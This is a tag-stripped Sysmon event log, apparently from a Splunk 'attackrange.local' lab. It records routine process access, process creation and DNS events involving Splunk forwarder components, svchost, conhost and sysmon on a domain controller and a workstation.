AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000441558Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.561{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E9A90EF50A4722D324B59E586C2F9D3,SHA256=CD47084EEFA4B71D2554332DDB8C155C4F2A238CC4E0438FEF628E9349405003,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441557Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.355{42DC5269-02CA-6088-D228-00000000BA01}42926228C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441556Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.272{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441555Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.272{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441554Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.219{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-02CA-6088-D228-00000000BA01}4292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441553Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.217{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441552Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.217{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441551Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.217{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441550Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.217{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441549Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.216{42DC5269-CE96-6086-0500-00000000BA01}412368C:\Windows\system32\csrss.exe{42DC5269-02CA-6088-D228-00000000BA01}4292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441548Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.216{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-02CA-6088-D228-00000000BA01}4292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441547Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:46.216{42DC5269-02CA-6088-D228-00000000BA01}4292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293294Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:47.882{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1001079F9024D15F3D7D63B1923E231C,SHA256=B2B12B0B76289968665D12123FF80899ECB0892483EA2E8BA859B7239C338BC8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441579Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.572{42DC5269-02CB-6088-D428-00000000BA01}46642300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441578Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.570{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72539B67BB7C14BB9240DFB583F87E4D,SHA256=6A8CE0167590DF97B60BEFDB6B50AD31227532E2CDC0E069CA3C2B75E0AF57E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441577Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.443{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-02CB-6088-D428-00000000BA01}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441576Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.441{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441575Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.441{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441574Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.441{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441573Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.441{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441572Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.440{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-02CB-6088-D428-00000000BA01}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441571Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.440{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-02CB-6088-D428-00000000BA01}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441570Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.440{42DC5269-02CB-6088-D428-00000000BA01}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000441569Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.273{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441568Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.273{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441567Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.221{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF18D363DE4E22C0072798FC5C02EE8E,SHA256=FD9F1C4AA5267220FE7A5327CB1556636FF78240FEAD4B50CC9D31C464249A2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293295Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:48.897{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FADF227017A27CC1CC3F196A0CC943B,SHA256=87224166509D9F248F330055CC99AB495E27314CC35A89B6CB8EE076BE080AEC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441601Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:45.824{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local50639- 10341000x8000000000000000441600Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.775{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-02CC-6088-D628-00000000BA01}596C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441599Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.773{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441598Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.773{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441597Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 